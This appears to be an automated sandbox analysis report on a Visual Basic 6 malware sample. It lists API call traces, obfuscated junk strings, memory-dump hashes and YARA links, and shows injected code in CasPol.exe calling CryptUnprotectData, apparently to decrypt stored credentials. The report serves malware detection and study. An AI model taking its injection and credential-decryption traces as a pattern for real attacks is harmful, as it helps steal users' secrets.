__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F1EB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F206
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F211
__vbaVarDup.MSVBVM60 ref: 0041F238
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F24B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F25E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F26E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F278
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F27E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F288
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F297
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F2AD
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F2BD
__vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F308
__vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F310
__vbaFreeVar.MSVBVM60(0041F326,?,?,00401546), ref: 0041F318
__vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F320

Strings

OVERBEBYRDES, xrefs: 0041F269
SNVRET, xrefs: 0041F264
Antievangelical9, xrefs: 0041F2B5
LAAGETS, xrefs: 0041F224
Dukkestuer, xrefs: 0041F16A

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 11630a238eb85b9f8f4a77870bef1f6570c2d1273dd1a386d5056b05daf4b5b8
Instruction ID: f2d15253067c6071e3169fb37671c2c9716ff9cab3d009f5c391d9107434bfc0
Opcode Fuzzy Hash: 11630a238eb85b9f8f4a77870bef1f6570c2d1273dd1a386d5056b05daf4b5b8
Instruction Fuzzy Hash: 11510A72D0020DABDB10EBE1C846FDEB778AF04708F50817BB515B71E1EB785A498B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7A9, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E7C5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E800
__vbaVarDup.MSVBVM60 ref: 0041E832
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041E845
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E84E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E858
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041E86B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E880
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E889
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E893
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E89B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8A5
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8B2
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8BB
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8C5
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8CD
__vbaFreeStr.MSVBVM60(0041E913,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E905
__vbaFreeStr.MSVBVM60(0041E913,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E90D

Strings

GILENO, xrefs: 0041E8A0
SKADESLSHOLDELSERNE, xrefs: 0041E7F4
Flskekdet, xrefs: 0041E81E
Fritgaaende, xrefs: 0041E7F9

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 0b36de2d1b9baa1a6980a534749f51b899f99906f35ee924853dc31c01512f3f
Instruction ID: 777f9abc72e3724b6f8c0b7e3feb8a44b471e464ddebcb32a68dee43277907db
Opcode Fuzzy Hash: 0b36de2d1b9baa1a6980a534749f51b899f99906f35ee924853dc31c01512f3f
Instruction Fuzzy Hash: 7531E972950258ABDB00FBD1DD86FEE77B8AF04704F54442AB501BB1E1DB789A098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420767, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420785
#535.MSVBVM60(?,?,?,?,00401546), ref: 004207CF
__vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00401546), ref: 004207F1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,0000004C), ref: 00420853
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 004208A5
__vbaFreeObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 004208BC
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208E2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208EC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208F4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420916
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042093A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 0042095F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 0042097F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004209AB
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004209C7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 004209D8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 004209E2
__vbaFreeStr.MSVBVM60(00420A46), ref: 00420A38
__vbaFreeStr.MSVBVM60(00420A46), ref: 00420A40

Strings

Cryptodeist, xrefs: 004209D3

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: 821f027d8d59d624d42e7af7113e77a785a02b83fdf90218c519074561c4a1d7
Instruction ID: 32f9ce972ed43ce6ced16437ebc1781c13ca8861e626d3360c0f3d99aa6f1090
Opcode Fuzzy Hash: 821f027d8d59d624d42e7af7113e77a785a02b83fdf90218c519074561c4a1d7
Instruction Fuzzy Hash: 8A712971900218EBDB10EF95CE45BDEB7B8AF04314F6086AAE115B71E1DB785B48CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00420119, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420134
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420146
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420150
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042015B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042016E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420181
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042018B
__vbaNew2.MSVBVM60(004025A0,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201E7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042022B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042023C
__vbaFreeStr.MSVBVM60(00420269,Skimmia,00000000,?,?,?,?,00401546), ref: 00420263

Strings

Printermanualen, xrefs: 004201FD
Skimmia, xrefs: 00420156

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: aa435f65f6411465fba9e46cf251e6541e6ee100043346517f4f2c04f3e1966b
Instruction ID: 02f006f38bdf809f65cd51ea96890a5b1fd2d4245cefb2ebfb6a0586a8c405c6
Opcode Fuzzy Hash: aa435f65f6411465fba9e46cf251e6541e6ee100043346517f4f2c04f3e1966b
Instruction Fuzzy Hash: 1C311871A50218EFCB00EFA5D986BEDBBF4BF08704F60406AF501B61E1DBB95900CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBDC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EBF8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EC22
__vbaVarDup.MSVBVM60 ref: 0041EC49
#607.MSVBVM60(?,000000BB,?), ref: 0041EC5B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041EC64
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041EC6E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041EC7D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041EC9E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECA7
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECB1
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECB9
__vbaFreeStr.MSVBVM60(0041ECFC,?,?,?,?,00401546), ref: 0041ECDB
__vbaAryDestruct.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECE6
__vbaFreeStr.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECEE
__vbaFreeStr.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECF6

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: 4b29d472cec14b0db805112cb1a39c9f5321520062d063b12ab11fbdc4f64d80
Instruction ID: b95eba25bacd7ca3d6c7bdb4dd5c54989d587c570b2574e24d603ff420ee1043
Opcode Fuzzy Hash: 4b29d472cec14b0db805112cb1a39c9f5321520062d063b12ab11fbdc4f64d80
Instruction Fuzzy Hash: 8531DE76900149ABDB00FBD1C986FDEB7B9AF04704F50843AB505B71E1EB786B09CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA09, Relevance: 16.5, APIs: 11, Instructions: 47COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FA25
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FA4F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FA5A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FA63
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA6C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA76
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA7E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA83
__vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FA9B
__vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FAA3
__vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FAAB

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: eaae57431234c90587fcfc8ebe0cd9364a3d33e9b32d701d7c5814e7891d1866
Instruction ID: 693852dd8944fc207f73713524658091ffc1878156aa4315fcb4ed92e6621c0d
Opcode Fuzzy Hash: eaae57431234c90587fcfc8ebe0cd9364a3d33e9b32d701d7c5814e7891d1866
Instruction Fuzzy Hash: D211FA31910149ABCB04FFA2C986EDEB774BF04748F50853AB501771E1EB3CAA06CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00420E67, Relevance: 13.6, APIs: 9, Instructions: 53COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420E83
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420EAD
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 00420EBB
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 00420EC8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420ED1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420EDB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420EEA
__vbaFreeStr.MSVBVM60(00420F23), ref: 00420F15
__vbaFreeStr.MSVBVM60(00420F23), ref: 00420F1D

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: b628ab3025051dbb522311c7f76f4921803e836e9b817ab5315d98a1f7a474c2
Instruction ID: b47ba6cb6cfe9537fd216ca96262c85262f1db123f7c31d4278a9a27857eaefe
Opcode Fuzzy Hash: b628ab3025051dbb522311c7f76f4921803e836e9b817ab5315d98a1f7a474c2
Instruction Fuzzy Hash: 6411DD72900218ABCB00FB91DD86EEEB7BCBF44748F54842AF501A71A1EB789605CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F341, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F35D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F385
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F38F
#593.MSVBVM60(0000000A), ref: 0041F3AC
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F3B7
#537.MSVBVM60(0000003B,0000000A), ref: 0041F3BE
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F3C8
__vbaFreeStr.MSVBVM60(0041F3EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F3E1
__vbaFreeStr.MSVBVM60(0041F3EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F3E9

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 316b31308a43112fef42106b2f5cd699d70758ed15948049cee89f217091de0c
Instruction ID: ca640c03beec4af6d082099bc43d86ae2034aa72d58194d0da08468fb277227d
Opcode Fuzzy Hash: 316b31308a43112fef42106b2f5cd699d70758ed15948049cee89f217091de0c
Instruction Fuzzy Hash: 59113071A40209ABDB01FBA1CC86BDE7BB4AF00708F10843AF501BB1E1DB7C9645CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED1B, Relevance: 12.0, APIs: 8, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041ED37
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041ED61
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041ED74
#536.MSVBVM60(00000005), ref: 0041ED87
__vbaStrMove.MSVBVM60(00000005), ref: 0041ED91
__vbaFreeVar.MSVBVM60(00000005), ref: 0041ED99
__vbaFreeStr.MSVBVM60(0041EDC0,00000005), ref: 0041EDB2
__vbaFreeStr.MSVBVM60(0041EDC0,00000005), ref: 0041EDBA

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: 552b9a0e46c1e401c01f65e268d5356e34434584d4332fbea828098f5c8dbf55
Instruction ID: bcc319732d83193761566249f4410b334ff801331151ac71e4b9571fc2eee605
Opcode Fuzzy Hash: 552b9a0e46c1e401c01f65e268d5356e34434584d4332fbea828098f5c8dbf55
Instruction Fuzzy Hash: 6B115E35800209ABCB00FFA6D846BDE7BB4BF45748F10846AF401771E1DB3C9A45CB59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exe PID: 3940 Parent PID: 5360 CasPol.exeCOMMON

Executed Functions

Function 015FBB1B, Relevance: 4.2, Instructions: 4177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc971e012662fa4bb65f07ce82a53a8735a6b9d2aa7fa40b70e15275e555f14
Instruction ID: d61a23da9637b71e4e83bc308ca9f08a8aa2e77a5f0db0cb51d79c72a21a4335
Opcode Fuzzy Hash: cfc971e012662fa4bb65f07ce82a53a8735a6b9d2aa7fa40b70e15275e555f14
Instruction Fuzzy Hash: 11835B31E047198FCB11DF68C85469DF7B1FF85314F16C6AAD588AB221EB30AAD5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C46C4, Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

lM{ , xrefs: 1E3C6C28
lM{ , xrefs: 1E3C6D9F

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID:
String ID: lM{ $lM{
API String ID: 0-3444797404
Opcode ID: b5ae6a10990d45ce0ffb8bf42f2b246ad5e6f5fb70c8664ba44b8fef4da05dbd
Instruction ID: e736608057d0229d9501df3afae9c8b9d9e0a1b0217bf3e1c72e5ba500eb331c
Opcode Fuzzy Hash: b5ae6a10990d45ce0ffb8bf42f2b246ad5e6f5fb70c8664ba44b8fef4da05dbd
Instruction Fuzzy Hash: A0A17D34E003199FCB04DBA1C8A49DDBBBABF89314F11871AE515AB7A4DB30EC45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 012A6950, Relevance: 2.5, APIs: 1, Instructions: 963libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43603a4a8f19886c3a9604ef034006dda035176875cb8470ff5c4e1c6de19a92
Instruction ID: 1839817adb0a728aa3789149f081f5a2e3b7412d05bd1dda0f23dfeee13ed26b
Opcode Fuzzy Hash: 43603a4a8f19886c3a9604ef034006dda035176875cb8470ff5c4e1c6de19a92
Instruction Fuzzy Hash: 5CA22774A15224CFCB65AF70C88869DB7B6BF88305F6080EAD50EA3344DB359E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 21576428, Relevance: 2.2, Instructions: 2171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f96071184538aef7d5839eae8b6d7d4104705525aa23e2e4af07685f9111d1d
Instruction ID: cfff01ee399bb07d8eb113b03137e7ea8dc170846f25deeca74c824fa9ebbaba
Opcode Fuzzy Hash: 6f96071184538aef7d5839eae8b6d7d4104705525aa23e2e4af07685f9111d1d
Instruction Fuzzy Hash: 6CF2F632D14792AFD315CA24C846ABEB7F6FB96736F5044FDE1905E242CB3498438BA1

Uniqueness

Uniqueness Score: -1.00%

Function 018719B0, Relevance: 2.1, Strings: 1, Instructions: 821COMMON

Download Yara Rule

Strings

4} , xrefs: 01872397

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID: 4}
API String ID: 0-2915410154
Opcode ID: f11d09b6783477d9283d6b90142181c2b01155b4b153000299a3242af0802e66
Instruction ID: 7a7f9fb6b6d70ef83e14f60273e60bd1f71d876ddb554ea70097609e3f98423d
Opcode Fuzzy Hash: f11d09b6783477d9283d6b90142181c2b01155b4b153000299a3242af0802e66
Instruction Fuzzy Hash: 8652F430B002449FDB15DFA8C894BAEBBE6AFC9304F148969E505EB791DB34ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01872B78, Relevance: 1.8, Instructions: 1798COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35e6cdeca0fdbe8f7855aad7f78330431221fe1a619e0ef05f66d02d1c21e7c
Instruction ID: a019d9d88dce919f48858d2a141fe4510f88dbe830d4d221990e3c20443ec52e
Opcode Fuzzy Hash: b35e6cdeca0fdbe8f7855aad7f78330431221fe1a619e0ef05f66d02d1c21e7c
Instruction Fuzzy Hash: F4133C70D1061A8ECB14EF68C884AADF7B1FF99310F15C699D55DAB261EB30AAC4CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01875908, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01876145

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 765e0c9af137cc081d2235b6e760beb31f4ffd914f176a82afd6641167fa2cc1
Instruction ID: 560075446da96c4a6e10422702f9cb0df9d74326ed3bb550d2fe1372754b6f08
Opcode Fuzzy Hash: 765e0c9af137cc081d2235b6e760beb31f4ffd914f176a82afd6641167fa2cc1
Instruction Fuzzy Hash: 1C1167B2800649DFDB10CF99C804BEEBFF4EF88320F148419E614A7211D734AA54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 018760D8, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01876145

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 724a62470e1f1d8bc85c71c38cc9c846af4330e7d40c9cbe2310126457a580fe
Instruction ID: d93dbab181b5e88a3919b61892078059d0017f1428d6bd8cc884e4ce1192e21b
Opcode Fuzzy Hash: 724a62470e1f1d8bc85c71c38cc9c846af4330e7d40c9cbe2310126457a580fe
Instruction Fuzzy Hash: D92156B6800649DFDB10CFA9D804BEEBFF4EF49324F148419EA54A7211C335AA54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C5D41, Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

=z ,, xrefs: 1E3C5D48

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID:
String ID: =z ,
API String ID: 0-3711916711
Opcode ID: d7c4c6eb2c7d900f1a3ac6deedf4ec76d2d7110d8bbdba1d6065fb2ce9ca46a0
Instruction ID: ffd58b6e4b02653a941d4affd636085950420ba9b0cfc84e87ec156987608278
Opcode Fuzzy Hash: d7c4c6eb2c7d900f1a3ac6deedf4ec76d2d7110d8bbdba1d6065fb2ce9ca46a0
Instruction Fuzzy Hash: 52E127B0809B45ABF702CF65CC481897BB1FB95328B24430AD2516B2F1D7BC548BFB68

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C6AF1, Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

lM{ , xrefs: 1E3C6C28

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID:
String ID: lM{
API String ID: 0-3746761153
Opcode ID: 5182e858a127232ccdf45f40cbd86be87754842793776f5159f1b9ced58d0473
Instruction ID: aedaf59563454c54efcf7fdd61b9d3f68110c712da2c84118fea07eb48e96161
Opcode Fuzzy Hash: 5182e858a127232ccdf45f40cbd86be87754842793776f5159f1b9ced58d0473
Instruction Fuzzy Hash: 2391AF35E003199FCB04CFB1C8949DDBBBABF8A314B15871AE516AB7A4DB30E845DB50

Uniqueness

Uniqueness Score: -1.00%

